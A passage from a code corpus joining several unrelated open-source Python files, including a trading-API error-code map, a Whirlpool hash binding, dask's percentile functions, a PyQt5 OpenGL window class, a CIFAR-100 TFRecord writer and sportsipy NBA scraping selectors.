-30: "没有订单修改和订单删除权限,成交删除权限",
-31: "没有订单转移权限",
-32: "成交录入时系统号为空",
-33: "成交删除时成交号为空。",
-34: "成交删除时没有找到对应的成交",
-35: "订单修改时客户账号变动。",
-36: "订单转移时客户账号没有变动",
-37: "修改的电话密码位数不对或者包含特殊字符。",
-38: "未绑定的二次认证信息",
-39: "二次认证有效期内不能再申请二次认证码",
-40: "没有设置客户密码的权限。",
-41: "风险保单单客户无法撤销或更改",
-42: "改单是客户账号填写与订单客户账号不一致",
-11001: "输入错误的:TAPIBucketDateFlag",
-11002: "输入错误的:TAPIHisQuoteType",
-12002: "输入错误的:TAPIUserTypeType",
-12018: "输入错误的:TAPIBankAccountStateType",
-12019: "输入错误的:TAPIBankAccountSwapStateType",
-12020: "输入错误的:TAPIBankAccountTransferStateType",
-12026: "输入错误的:TAPIPartyTypeType",
-12027: "输入错误的:TAPIPartyCertificateTypeType",
-12028: "输入错误的:TAPIMsgReceiverType",
-12029: "输入错误的:TAPIMsgTypeType",
-12030: "输入错误的:TAPIMsgLevelType",
-12031: "输入错误的:TAPITransferDirectType",
-12032: "输入错误的:TAPITransferStateType",
-12033: "输入错误的:TAPITransferTypeType",
-12034: "输入错误的:TAPITransferDeviceIDType",
-12037: "输入错误的:TAPIBillTypeType",
-12038: "输入错误的:TAPIBillFileTypeType",
-12039: "输入错误的:TAPIOFFFlagType",
-12040: "输入错误的:TAPICashAdjustTypeType",
-12046: "输入错误的: ClientID,ClientID包含特殊字符。",
-13001: "历史行情查询参数不合法",
-13002: "价格和数量中包含NAN或者INF不合法的数值",
-12047: "输入错误的到期日",
-12048: "错误的密码类型",
-12049: "错误的结算数据类型",
}
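# Small usage sketch (hypothetical helper, not part of the original module).
# Code 0 maps to None above, so fall back to a generic message when a code is
# unknown or carries no text.
def describe_error(code):
    """Return the mapped message for an error code, or a generic fallback."""
    message = error_map.get(code)
    return message if message else "Unknown error code: {}".format(code)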
|
hippy/module/hash/cwhirlpool.py | jweinraub/hippyvm | 289 | 12739962 |
from rpython.translator.tool.cbuild import ExternalCompilationInfo
from rpython.rtyper.tool import rffi_platform as platform
from rpython.rtyper.lltypesystem import rffi, lltype
from hippy.tool.platform import get_gmake
import subprocess
import py
LIBDIR = py.path.local(__file__).join('..', 'lib', 'whirlpool/')
subprocess.check_call([get_gmake(), '-C', str(LIBDIR)])
eci = ExternalCompilationInfo(
includes=['whirlpool.h'],
library_dirs=[str(LIBDIR)],
libraries=['whirlpool1'],
testonly_libraries=['whirlpool'],
include_dirs=[str(LIBDIR)])
class CConfig:
_compilation_info_ = eci
WHIRLPOOL_CTX = platform.Struct('WHIRLPOOL_CTX', [])
globals().update(platform.configure(CConfig))
def external(name, args, result):
return rffi.llexternal(name, args, result,
compilation_info=eci, releasegil=False)
PTR_WHIRLPOOL_CTX = lltype.Ptr(WHIRLPOOL_CTX)
c_WHIRLPOOLInit = external('WHIRLPOOLInit',
[PTR_WHIRLPOOL_CTX], lltype.Void)
c_WHIRLPOOLUpdate = external('WHIRLPOOLUpdate',
[PTR_WHIRLPOOL_CTX,
rffi.CCHARP,
rffi.UINT],
lltype.Void)
c_WHIRLPOOLFinal = external('WHIRLPOOLFinal',
[rffi.CCHARP,
PTR_WHIRLPOOL_CTX],
lltype.Void)
|
dask/array/percentile.py | marcelned/dask | 9,684 | 12740002 |
from collections.abc import Iterator
from functools import wraps
from numbers import Number
import numpy as np
from tlz import merge
from ..base import tokenize
from ..highlevelgraph import HighLevelGraph
from .core import Array
@wraps(np.percentile)
def _percentile(a, q, interpolation="linear"):
n = len(a)
if not len(a):
return None, n
if isinstance(q, Iterator):
q = list(q)
if a.dtype.name == "category":
result = np.percentile(a.cat.codes, q, interpolation=interpolation)
import pandas as pd
return pd.Categorical.from_codes(result, a.dtype.categories, a.dtype.ordered), n
if type(a.dtype).__name__ == "DatetimeTZDtype":
import pandas as pd
if isinstance(a, (pd.Series, pd.Index)):
a = a.values
if np.issubdtype(a.dtype, np.datetime64):
values = a
a2 = values.view("i8")
result = np.percentile(a2, q, interpolation=interpolation).astype(values.dtype)
if q[0] == 0:
# https://github.com/dask/dask/issues/6864
result[0] = min(result[0], values.min())
return result, n
if not np.issubdtype(a.dtype, np.number):
interpolation = "nearest"
return np.percentile(a, q, interpolation=interpolation), n
def _tdigest_chunk(a):
from crick import TDigest
t = TDigest()
t.update(a)
return t
def _percentiles_from_tdigest(qs, digests):
from crick import TDigest
t = TDigest()
t.merge(*digests)
return np.array(t.quantile(qs / 100.0))
def percentile(a, q, interpolation="linear", method="default"):
"""Approximate percentile of 1-D array
Parameters
----------
a : Array
q : array_like of float
Percentile or sequence of percentiles to compute, which must be between
0 and 100 inclusive.
interpolation : {'linear', 'lower', 'higher', 'midpoint', 'nearest'}, optional
The interpolation method to use when the desired percentile lies
between two data points ``i < j``. Only valid for ``method='dask'``.
- 'linear': ``i + (j - i) * fraction``, where ``fraction``
is the fractional part of the index surrounded by ``i``
and ``j``.
- 'lower': ``i``.
- 'higher': ``j``.
- 'nearest': ``i`` or ``j``, whichever is nearest.
- 'midpoint': ``(i + j) / 2``.
method : {'default', 'dask', 'tdigest'}, optional
What method to use. By default will use dask's internal custom
algorithm (``'dask'``). If set to ``'tdigest'`` will use tdigest for
floats and ints and fallback to the ``'dask'`` otherwise.
See Also
--------
numpy.percentile : Numpy's equivalent Percentile function
"""
from .dispatch import percentile_lookup as _percentile
from .utils import array_safe, meta_from_array
if not a.ndim == 1:
raise NotImplementedError("Percentiles only implemented for 1-d arrays")
if isinstance(q, Number):
q = [q]
q = array_safe(q, like=meta_from_array(a))
token = tokenize(a, q, interpolation)
dtype = a.dtype
if np.issubdtype(dtype, np.integer):
dtype = (array_safe([], dtype=dtype, like=meta_from_array(a)) / 0.5).dtype
meta = meta_from_array(a, dtype=dtype)
allowed_methods = ["default", "dask", "tdigest"]
if method not in allowed_methods:
raise ValueError("method can only be 'default', 'dask' or 'tdigest'")
if method == "default":
internal_method = "dask"
else:
internal_method = method
# Allow using t-digest if interpolation is allowed and dtype is of floating or integer type
if (
internal_method == "tdigest"
and interpolation == "linear"
and (np.issubdtype(dtype, np.floating) or np.issubdtype(dtype, np.integer))
):
from dask.utils import import_required
import_required(
"crick", "crick is a required dependency for using the t-digest method."
)
name = "percentile_tdigest_chunk-" + token
dsk = {
(name, i): (_tdigest_chunk, key) for i, key in enumerate(a.__dask_keys__())
}
name2 = "percentile_tdigest-" + token
dsk2 = {(name2, 0): (_percentiles_from_tdigest, q, sorted(dsk))}
# Otherwise use the custom percentile algorithm
else:
# Add 0 and 100 during calculation for more robust behavior (hopefully)
calc_q = np.pad(q, 1, mode="constant")
calc_q[-1] = 100
name = "percentile_chunk-" + token
dsk = {
(name, i): (_percentile, key, calc_q, interpolation)
for i, key in enumerate(a.__dask_keys__())
}
name2 = "percentile-" + token
dsk2 = {
(name2, 0): (
merge_percentiles,
q,
[calc_q] * len(a.chunks[0]),
sorted(dsk),
interpolation,
)
}
dsk = merge(dsk, dsk2)
graph = HighLevelGraph.from_collections(name2, dsk, dependencies=[a])
return Array(graph, name2, chunks=((len(q),),), meta=meta)
def merge_percentiles(
finalq, qs, vals, interpolation="lower", Ns=None, raise_on_nan=True
):
"""Combine several percentile calculations of different data.
Parameters
----------
finalq : numpy.array
Percentiles to compute (must use same scale as ``qs``).
qs : sequence of :class:`numpy.array`s
Percentiles calculated on different sets of data.
vals : sequence of :class:`numpy.array`s
Resulting values associated with percentiles ``qs``.
Ns : sequence of integers
The number of data elements associated with each data set.
interpolation : {'linear', 'lower', 'higher', 'midpoint', 'nearest'}
Specify the type of interpolation to use to calculate final
percentiles. For more information, see :func:`numpy.percentile`.
Examples
--------
>>> finalq = [10, 20, 30, 40, 50, 60, 70, 80]
>>> qs = [[20, 40, 60, 80], [20, 40, 60, 80]]
>>> vals = [np.array([1, 2, 3, 4]), np.array([10, 11, 12, 13])]
>>> Ns = [100, 100] # Both original arrays had 100 elements
>>> merge_percentiles(finalq, qs, vals, Ns=Ns)
array([ 1, 2, 3, 4, 10, 11, 12, 13])
"""
from .utils import array_safe
if isinstance(finalq, Iterator):
finalq = list(finalq)
finalq = array_safe(finalq, like=finalq)
qs = list(map(list, qs))
vals = list(vals)
if Ns is None:
vals, Ns = zip(*vals)
Ns = list(Ns)
L = list(zip(*[(q, val, N) for q, val, N in zip(qs, vals, Ns) if N]))
if not L:
if raise_on_nan:
raise ValueError("No non-trivial arrays found")
return np.full(len(qs[0]) - 2, np.nan)
qs, vals, Ns = L
# TODO: Perform this check above in percentile once dtype checking is easy
# Here we silently change meaning
if vals[0].dtype.name == "category":
result = merge_percentiles(
finalq, qs, [v.codes for v in vals], interpolation, Ns, raise_on_nan
)
import pandas as pd
return pd.Categorical.from_codes(result, vals[0].categories, vals[0].ordered)
if not np.issubdtype(vals[0].dtype, np.number):
interpolation = "nearest"
if len(vals) != len(qs) or len(Ns) != len(qs):
raise ValueError("qs, vals, and Ns parameters must be the same length")
# transform qs and Ns into number of observations between percentiles
counts = []
for q, N in zip(qs, Ns):
count = np.empty_like(finalq, shape=len(q))
count[1:] = np.diff(array_safe(q, like=q[0]))
count[0] = q[0]
count *= N
counts.append(count)
# Sort by calculated percentile values, then number of observations.
combined_vals = np.concatenate(vals)
combined_counts = array_safe(np.concatenate(counts), like=combined_vals)
sort_order = np.argsort(combined_vals)
combined_vals = np.take(combined_vals, sort_order)
combined_counts = np.take(combined_counts, sort_order)
# percentile-like, but scaled by total number of observations
combined_q = np.cumsum(combined_counts)
# rescale finalq percentiles to match combined_q
finalq = array_safe(finalq, like=combined_vals)
desired_q = finalq * sum(Ns)
# the behavior of different interpolation methods should be
# investigated further.
if interpolation == "linear":
rv = np.interp(desired_q, combined_q, combined_vals)
else:
left = np.searchsorted(combined_q, desired_q, side="left")
right = np.searchsorted(combined_q, desired_q, side="right") - 1
np.minimum(left, len(combined_vals) - 1, left) # don't exceed max index
lower = np.minimum(left, right)
upper = np.maximum(left, right)
if interpolation == "lower":
rv = combined_vals[lower]
elif interpolation == "higher":
rv = combined_vals[upper]
elif interpolation == "midpoint":
rv = 0.5 * (combined_vals[lower] + combined_vals[upper])
elif interpolation == "nearest":
lower_residual = np.abs(combined_q[lower] - desired_q)
upper_residual = np.abs(combined_q[upper] - desired_q)
mask = lower_residual > upper_residual
index = lower # alias; we no longer need lower
index[mask] = upper[mask]
rv = combined_vals[index]
else:
raise ValueError(
"interpolation can only be 'linear', 'lower', "
"'higher', 'midpoint', or 'nearest'"
)
return rv
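# Usage sketch (not part of this module): approximate quartiles of a chunked
# 1-D dask array; the array sizes are illustrative only. The import is done
# inside the function to avoid a circular import at module load time.
def _example_quartiles():
    """Compute approximate 25th/50th/75th percentiles of a random dask array."""
    import dask.array as da
    x = da.random.random(1_000_000, chunks=100_000)
    return da.percentile(x, [25, 50, 75]).compute()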
|
moderngl_window/context/pyqt5/window.py | DavideRuzza/moderngl-window | 142 | 12740031 | from typing import Tuple
from PyQt5 import QtCore, QtOpenGL, QtWidgets, QtGui
from moderngl_window.context.base import BaseWindow
from moderngl_window.context.pyqt5.keys import Keys
class Window(BaseWindow):
"""
A basic window implementation using PyQt5 with the goal of
creating an OpenGL context and handle keyboard and mouse input.
This window bypasses Qt's own event loop to make things as flexible as possible.
If you need to use the event loop and are using other features
in Qt as well, this example can still be useful as a reference
when creating your own window.
"""
#: Name of the window
name = "pyqt5"
#: PyQt5 specific key constants
keys = Keys
    # PyQt supports more buttons, but we are limited by other libraries
_mouse_button_map = {
1: 1,
2: 2,
4: 3,
}
def __init__(self, **kwargs):
super().__init__(**kwargs)
# Specify OpenGL context parameters
gl = QtOpenGL.QGLFormat()
gl.setVersion(self.gl_version[0], self.gl_version[1])
gl.setProfile(QtOpenGL.QGLFormat.CoreProfile)
gl.setDepthBufferSize(24)
gl.setDoubleBuffer(True)
gl.setSwapInterval(1 if self.vsync else 0)
# Configure multisampling if needed
if self.samples > 1:
gl.setSampleBuffers(True)
gl.setSamples(int(self.samples))
# We need an application object, but we are bypassing the library's
# internal event loop to avoid unnecessary work
self._app = QtWidgets.QApplication([])
# Create the OpenGL widget
self._widget = QtOpenGL.QGLWidget(gl)
self.title = self._title
# If fullscreen we change the window to match the desktop on the primary screen
if self.fullscreen:
rect = QtWidgets.QDesktopWidget().screenGeometry()
self._width = rect.width()
self._height = rect.height()
self._buffer_width = rect.width() * self._widget.devicePixelRatio()
self._buffer_height = rect.height() * self._widget.devicePixelRatio()
if self.resizable:
# Ensure a valid resize policy when window is resizable
size_policy = QtWidgets.QSizePolicy(
QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding,
)
self._widget.setSizePolicy(size_policy)
self._widget.resize(self.width, self.height)
else:
self._widget.setFixedSize(self.width, self.height)
# Center the window on the screen if in window mode
if not self.fullscreen:
center_window_position = (
self.position[0] - self.width / 2,
self.position[1] - self.height / 2,
)
self._widget.move(*center_window_position)
# Needs to be set before show()
self._widget.resizeGL = self.resize
self.cursor = self._cursor
if self.fullscreen:
self._widget.showFullScreen()
else:
self._widget.show()
# We want mouse position events
self._widget.setMouseTracking(True)
# Override event functions in qt
self._widget.keyPressEvent = self.key_pressed_event
self._widget.keyReleaseEvent = self.key_release_event
self._widget.mouseMoveEvent = self.mouse_move_event
self._widget.mousePressEvent = self.mouse_press_event
self._widget.mouseReleaseEvent = self.mouse_release_event
self._widget.wheelEvent = self.mouse_wheel_event
self._widget.closeEvent = self.close_event
self._widget.showEvent = self.show_event
self._widget.hideEvent = self.hide_event
# Attach to the context
self.init_mgl_context()
# Ensure retina and 4k displays get the right viewport
self._buffer_width = self._width * self._widget.devicePixelRatio()
self._buffer_height = self._height * self._widget.devicePixelRatio()
self.set_default_viewport()
def _set_fullscreen(self, value: bool) -> None:
if value:
self._widget.showFullScreen()
else:
self._widget.showNormal()
@property
def size(self) -> Tuple[int, int]:
"""Tuple[int, int]: current window size.
This property also support assignment::
# Resize the window to 1000 x 1000
window.size = 1000, 1000
"""
return self._width, self._height
@size.setter
def size(self, value: Tuple[int, int]):
pos = self.position
self._widget.setGeometry(pos[0], pos[1], value[0], value[1])
@property
def position(self) -> Tuple[int, int]:
"""Tuple[int, int]: The current window position.
This property can also be set to move the window::
# Move window to 100, 100
window.position = 100, 100
"""
geo = self._widget.geometry()
return geo.x(), geo.y()
@position.setter
def position(self, value: Tuple[int, int]):
self._widget.setGeometry(value[0], value[1], self._width, self._height)
def swap_buffers(self) -> None:
"""Swap buffers, set viewport, trigger events and increment frame counter"""
self._widget.swapBuffers()
self.set_default_viewport()
self._app.processEvents()
self._frames += 1
@property
def cursor(self) -> bool:
"""bool: Should the mouse cursor be visible inside the window?
This property can also be assigned to::
# Disable cursor
window.cursor = False
"""
return self._cursor
@cursor.setter
def cursor(self, value: bool):
if value is True:
self._widget.setCursor(QtCore.Qt.ArrowCursor)
else:
self._widget.setCursor(QtCore.Qt.BlankCursor)
self._cursor = value
@property
def title(self) -> str:
"""str: Window title.
This property can also be set::
window.title = "New Title"
"""
return self._title
@title.setter
def title(self, value: str):
self._widget.setWindowTitle(value)
self._title = value
def resize(self, width: int, height: int) -> None:
"""Replacement for Qt's ``resizeGL`` method.
Args:
width: New window width
height: New window height
"""
self._width = width // self._widget.devicePixelRatio()
self._height = height // self._widget.devicePixelRatio()
self._buffer_width = width
self._buffer_height = height
if self._ctx:
self.set_default_viewport()
# Make sure we notify the example about the resize
super().resize(self._buffer_width, self._buffer_height)
def _handle_modifiers(self, mods) -> None:
"""Update modifiers"""
self._modifiers.shift = bool(mods & QtCore.Qt.ShiftModifier)
self._modifiers.ctrl = bool(mods & QtCore.Qt.ControlModifier)
self._modifiers.alt = bool(mods & QtCore.Qt.AltModifier)
def _set_icon(self, icon_path: str) -> None:
self._widget.setWindowIcon(QtGui.QIcon(icon_path))
def key_pressed_event(self, event) -> None:
"""Process Qt key press events forwarding them to standard methods
Args:
event: The qtevent instance
"""
if self._exit_key is not None and event.key() == self._exit_key:
self.close()
if self._fs_key is not None and event.key() == self._fs_key:
self.fullscreen = not self.fullscreen
self._handle_modifiers(event.modifiers())
self._key_pressed_map[event.key()] = True
self._key_event_func(event.key(), self.keys.ACTION_PRESS, self._modifiers)
text = event.text()
if text.strip() or event.key() == self.keys.SPACE:
self._unicode_char_entered_func(text)
def key_release_event(self, event) -> None:
"""Process Qt key release events forwarding them to standard methods
Args:
event: The qtevent instance
"""
self._handle_modifiers(event.modifiers())
self._key_pressed_map[event.key()] = False
self._key_event_func(event.key(), self.keys.ACTION_RELEASE, self._modifiers)
def mouse_move_event(self, event) -> None:
"""Forward mouse cursor position events to standard methods
Args:
event: The qtevent instance
"""
x, y = event.x(), event.y()
dx, dy = self._calc_mouse_delta(x, y)
if self.mouse_states.any:
self._mouse_drag_event_func(x, y, dx, dy)
else:
self._mouse_position_event_func(x, y, dx, dy)
def mouse_press_event(self, event) -> None:
"""Forward mouse press events to standard methods
Args:
event: The qtevent instance
"""
self._handle_modifiers(event.modifiers())
button = self._mouse_button_map.get(event.button())
if button is None:
return
self._handle_mouse_button_state_change(button, True)
self._mouse_press_event_func(event.x(), event.y(), button)
def mouse_release_event(self, event) -> None:
"""Forward mouse release events to standard methods
Args:
event: The qtevent instance
"""
self._handle_modifiers(event.modifiers())
button = self._mouse_button_map.get(event.button())
if button is None:
return
self._handle_mouse_button_state_change(button, False)
self._mouse_release_event_func(event.x(), event.y(), button)
def mouse_wheel_event(self, event):
"""Forward mouse wheel events to standard metods.
From Qt docs:
Returns the distance that the wheel is rotated, in eighths of a degree.
A positive value indicates that the wheel was rotated forwards away from the user;
a negative value indicates that the wheel was rotated backwards toward the user.
Most mouse types work in steps of 15 degrees, in which case the delta value is a
multiple of 120; i.e., 120 units * 1/8 = 15 degrees.
However, some mice have finer-resolution wheels and send delta values that are less
than 120 units (less than 15 degrees). To support this possibility, you can either
cumulatively add the delta values from events until the value of 120 is reached,
then scroll the widget, or you can partially scroll the widget in response to each
wheel event.
Args:
event (QWheelEvent): Mouse wheel event
"""
self._handle_modifiers(event.modifiers())
point = event.angleDelta()
self._mouse_scroll_event_func(point.x() / 120.0, point.y() / 120.0)
def close_event(self, event) -> None:
"""The standard PyQt close events
Args:
event: The qtevent instance
"""
self.close()
def close(self):
"""Close the window"""
super().close()
self._close_func()
def show_event(self, event):
"""The standard Qt show event"""
self._iconify_func(False)
def hide_event(self, event):
"""The standard Qt hide event"""
self._iconify_func(True)
def destroy(self) -> None:
"""Quit the Qt application to exit the window gracefully"""
QtCore.QCoreApplication.instance().quit()
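# Small illustration (not part of the class) of the Qt wheel-delta convention
# quoted in mouse_wheel_event above: angleDelta() reports eighths of a degree,
# and 120 units correspond to one standard 15-degree wheel notch.
def _scroll_steps(angle_delta: int) -> float:
    """Convert a QWheelEvent angleDelta() component into scroll steps."""
    return angle_delta / 120.0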
|
capslayer/data/datasets/cifar100/writer.py | ForkedReposBak/CapsLayer | 379 | 12740035 | # Copyright 2018 The CapsLayer Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==========================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import numpy as np
import tensorflow as tf
from tensorflow.python.keras.utils.data_utils import get_file
from tensorflow.python.keras.datasets.cifar import load_batch
from capslayer.data.utils.TFRecordHelper import int64_feature, bytes_feature
URL = "https://www.cs.toronto.edu/~kriz/cifar-100-python.tar.gz"
md5sum = 'eb9058c3a382ffc7106e4002c42a8d85'
def load_cifar100(split, path=None):
if path is None:
cache_path = os.path.join(os.path.expanduser('~'), ".capslayer")
path = get_file('cifar-100-python', cache_dir=cache_path, file_hash=md5sum, origin=URL, untar=True)
split = split.lower()
    if split == 'test':
        fpath = os.path.join(path, 'test')
        images, labels = load_batch(fpath, label_key='fine_labels')
        labels = np.reshape(labels, (-1, ))
    else:
        fpath = os.path.join(path, 'train')
        images, labels = load_batch(fpath, label_key='fine_labels')
        # Shuffle deterministically, then carve the 50k training batch into a
        # 45k train split and a 5k eval split. Only train/eval are sliced here;
        # slicing the 10k test batch this way would return no data.
        idx = np.arange(len(images))
        np.random.seed(201808)
        np.random.shuffle(idx)
        labels = np.reshape(labels, (-1, ))
        images = images[idx[:45000]] if split == "train" else images[idx[45000:]]
        labels = labels[idx[:45000]] if split == "train" else labels[idx[45000:]]
    images = np.reshape(images.transpose(0, 2, 3, 1), (-1, 3072)).astype(np.float32)
    labels = np.reshape(labels, (-1, )).astype(np.int32)
    return zip(images, labels)
def encode_and_write(dataset, filename):
with tf.python_io.TFRecordWriter(filename) as writer:
for image, label in dataset:
image_raw = image.tostring()
example = tf.train.Example(features=tf.train.Features(
feature={'image': bytes_feature(image_raw),
'label': int64_feature(label)}))
writer.write(example.SerializeToString())
def tfrecord_runner(path=None, force=True):
train_set = load_cifar100(path=path, split='train')
eval_set = load_cifar100(path=path, split='eval')
test_set = load_cifar100(path=path, split='test')
if path is None:
path = os.path.join(os.path.expanduser('~'), ".capslayer", "datasets", "cifar100")
if not os.path.exists(path):
os.makedirs(path)
train_set_outpath = os.path.join(path, "train_cifar100.tfrecord")
eval_set_outpath = os.path.join(path, "eval_cifar100.tfrecord")
test_set_outpath = os.path.join(path, "test_cifar100.tfrecord")
if not os.path.exists(train_set_outpath) or force:
encode_and_write(train_set, train_set_outpath)
if not os.path.exists(eval_set_outpath) or force:
encode_and_write(eval_set, eval_set_outpath)
if not os.path.exists(test_set_outpath) or force:
encode_and_write(test_set, test_set_outpath)
if __name__ == "__main__":
data = load_cifar100(split='train')
print(data)
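# A matching decode sketch (not part of the original module; it assumes the
# same TensorFlow 1.x API the writer above relies on).
def example_decode(filename):
    """Yield (image, label) pairs back out of a TFRecord written by encode_and_write."""
    for record in tf.python_io.tf_record_iterator(filename):
        example = tf.train.Example()
        example.ParseFromString(record)
        feature = example.features.feature
        image = np.frombuffer(feature['image'].bytes_list.value[0], dtype=np.float32)
        label = feature['label'].int64_list.value[0]
        yield image, label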
|
sportsipy/nba/constants.py | MArtinherz/sportsipy | 221 | 12740050 | PARSING_SCHEME = {
'name': 'a',
'games_played': 'td[data-stat="g"]:first',
'minutes_played': 'td[data-stat="mp"]:first',
'field_goals': 'td[data-stat="fg"]:first',
'field_goal_attempts': 'td[data-stat="fga"]:first',
'field_goal_percentage': 'td[data-stat="fg_pct"]:first',
'three_point_field_goals': 'td[data-stat="fg3"]:first',
'three_point_field_goal_attempts': 'td[data-stat="fg3a"]:first',
'three_point_field_goal_percentage': 'td[data-stat="fg3_pct"]:first',
'two_point_field_goals': 'td[data-stat="fg2"]:first',
'two_point_field_goal_attempts': 'td[data-stat="fg2a"]:first',
'two_point_field_goal_percentage': 'td[data-stat="fg2_pct"]:first',
'free_throws': 'td[data-stat="ft"]:first',
'free_throw_attempts': 'td[data-stat="fta"]:first',
'free_throw_percentage': 'td[data-stat="ft_pct"]:first',
'offensive_rebounds': 'td[data-stat="orb"]:first',
'defensive_rebounds': 'td[data-stat="drb"]:first',
'total_rebounds': 'td[data-stat="trb"]:first',
'assists': 'td[data-stat="ast"]:first',
'steals': 'td[data-stat="stl"]:first',
'blocks': 'td[data-stat="blk"]:first',
'turnovers': 'td[data-stat="tov"]:first',
'personal_fouls': 'td[data-stat="pf"]:first',
'points': 'td[data-stat="pts"]:first',
'opp_minutes_played': 'td[data-stat="mp"]:first',
'opp_field_goals': 'td[data-stat="opp_fg"]:first',
'opp_field_goal_attempts': 'td[data-stat="opp_fga"]:first',
'opp_field_goal_percentage': 'td[data-stat="opp_fg_pct"]:first',
'opp_three_point_field_goals': 'td[data-stat="opp_fg3"]:first',
'opp_three_point_field_goal_attempts': 'td[data-stat="opp_fg3a"]:first',
'opp_three_point_field_goal_percentage':
'td[data-stat="opp_fg3_pct"]:first',
'opp_two_point_field_goals': 'td[data-stat="opp_fg2"]:first',
'opp_two_point_field_goal_attempts': 'td[data-stat="opp_fg2a"]:first',
'opp_two_point_field_goal_percentage': 'td[data-stat="opp_fg2_pct"]:first',
'opp_free_throws': 'td[data-stat="opp_ft"]:first',
'opp_free_throw_attempts': 'td[data-stat="opp_fta"]:first',
'opp_free_throw_percentage': 'td[data-stat="opp_ft_pct"]:first',
'opp_offensive_rebounds': 'td[data-stat="opp_orb"]:first',
'opp_defensive_rebounds': 'td[data-stat="opp_drb"]:first',
'opp_total_rebounds': 'td[data-stat="opp_trb"]:first',
'opp_assists': 'td[data-stat="opp_ast"]:first',
'opp_steals': 'td[data-stat="opp_stl"]:first',
'opp_blocks': 'td[data-stat="opp_blk"]:first',
'opp_turnovers': 'td[data-stat="opp_tov"]:first',
'opp_personal_fouls': 'td[data-stat="opp_pf"]:first',
'opp_points': 'td[data-stat="opp_pts"]:first'
}
SCHEDULE_SCHEME = {
'game': 'th[data-stat="g"]:first',
'date': 'td[data-stat="date_game"]:first',
'time': 'td[data-stat="game_start_time"]:first',
'boxscore': 'td[data-stat="box_score_text"]:first',
'location': 'td[data-stat="game_location"]:first',
'opponent_abbr': 'td[data-stat="opp_id"]:first',
'opponent_name': 'td[data-stat="opp_name"]:first',
'result': 'td[data-stat="game_result"]:first',
'points_scored': 'td[data-stat="pts"]:first',
'points_allowed': 'td[data-stat="opp_pts"]:first',
'wins': 'td[data-stat="wins"]:first',
'losses': 'td[data-stat="losses"]:first',
'streak': 'td[data-stat="game_streak"]:first'
}
BOXSCORE_SCHEME = {
'date': 'div[class="scorebox_meta"]',
'location': 'div[class="scorebox_meta"]',
'away_name': 'a[itemprop="name"]:first',
'home_name': 'a[itemprop="name"]:last',
'winning_name': '',
'winning_abbr': '',
'losing_name': '',
'losing_abbr': '',
'summary': 'table#line_score',
'pace': 'td[data-stat="pace"]:first',
'away_record': 'div[class="table_wrapper"] h2',
'away_minutes_played': 'tfoot td[data-stat="mp"]',
'away_field_goals': 'tfoot td[data-stat="fg"]',
'away_field_goal_attempts': 'tfoot td[data-stat="fga"]',
'away_field_goal_percentage': 'tfoot td[data-stat="fg_pct"]',
'away_two_point_field_goals': 'tfoot td[data-stat="fg2"]',
'away_two_point_field_goal_attempts': 'tfoot td[data-stat="fg2a"]',
'away_two_point_field_goal_percentage': 'tfoot td[data-stat="fg2_pct"]',
'away_three_point_field_goals': 'tfoot td[data-stat="fg3"]',
'away_three_point_field_goal_attempts': 'tfoot td[data-stat="fg3a"]',
'away_three_point_field_goal_percentage': 'tfoot td[data-stat="fg3_pct"]',
'away_free_throws': 'tfoot td[data-stat="ft"]',
'away_free_throw_attempts': 'tfoot td[data-stat="fta"]',
'away_free_throw_percentage': 'tfoot td[data-stat="ft_pct"]',
'away_offensive_rebounds': 'tfoot td[data-stat="orb"]',
'away_defensive_rebounds': 'tfoot td[data-stat="drb"]',
'away_total_rebounds': 'tfoot td[data-stat="trb"]',
'away_assists': 'tfoot td[data-stat="ast"]',
'away_steals': 'tfoot td[data-stat="stl"]',
'away_blocks': 'tfoot td[data-stat="blk"]',
'away_turnovers': 'tfoot td[data-stat="tov"]',
'away_personal_fouls': 'tfoot td[data-stat="pf"]',
'away_points': 'tfoot td[data-stat="pts"]',
'away_true_shooting_percentage': 'tfoot td[data-stat="ts_pct"]',
'away_effective_field_goal_percentage': 'tfoot td[data-stat="efg_pct"]',
'away_three_point_attempt_rate': 'tfoot td[data-stat="fg3a_per_fga_pct"]',
'away_free_throw_attempt_rate': 'tfoot td[data-stat="fta_per_fga_pct"]',
'away_offensive_rebound_percentage': 'tfoot td[data-stat="orb_pct"]',
'away_defensive_rebound_percentage': 'tfoot td[data-stat="drb_pct"]',
'away_total_rebound_percentage': 'tfoot td[data-stat="trb_pct"]',
'away_assist_percentage': 'tfoot td[data-stat="ast_pct"]',
'away_steal_percentage': 'tfoot td[data-stat="stl_pct"]',
'away_block_percentage': 'tfoot td[data-stat="blk_pct"]',
'away_turnover_percentage': 'tfoot td[data-stat="tov_pct"]',
'away_offensive_rating': 'tfoot td[data-stat="off_rtg"]',
'away_defensive_rating': 'tfoot td[data-stat="def_rtg"]',
'home_record': 'div[class="table_wrapper"] h2',
'home_minutes_played': 'tfoot td[data-stat="mp"]',
'home_field_goals': 'tfoot td[data-stat="fg"]',
'home_field_goal_attempts': 'tfoot td[data-stat="fga"]',
'home_field_goal_percentage': 'tfoot td[data-stat="fg_pct"]',
'home_two_point_field_goals': 'tfoot td[data-stat="fg2"]',
'home_two_point_field_goal_attempts': 'tfoot td[data-stat="fg2a"]',
'home_two_point_field_goal_percentage': 'tfoot td[data-stat="fg2_pct"]',
'home_three_point_field_goals': 'tfoot td[data-stat="fg3"]',
'home_three_point_field_goal_attempts': 'tfoot td[data-stat="fg3a"]',
'home_three_point_field_goal_percentage': 'tfoot td[data-stat="fg3_pct"]',
'home_free_throws': 'tfoot td[data-stat="ft"]',
'home_free_throw_attempts': 'tfoot td[data-stat="fta"]',
'home_free_throw_percentage': 'tfoot td[data-stat="ft_pct"]',
'home_offensive_rebounds': 'tfoot td[data-stat="orb"]',
'home_defensive_rebounds': 'tfoot td[data-stat="drb"]',
'home_total_rebounds': 'tfoot td[data-stat="trb"]',
'home_assists': 'tfoot td[data-stat="ast"]',
'home_steals': 'tfoot td[data-stat="stl"]',
'home_blocks': 'tfoot td[data-stat="blk"]',
'home_turnovers': 'tfoot td[data-stat="tov"]',
'home_personal_fouls': 'tfoot td[data-stat="pf"]',
'home_points': 'div[class="score"]',
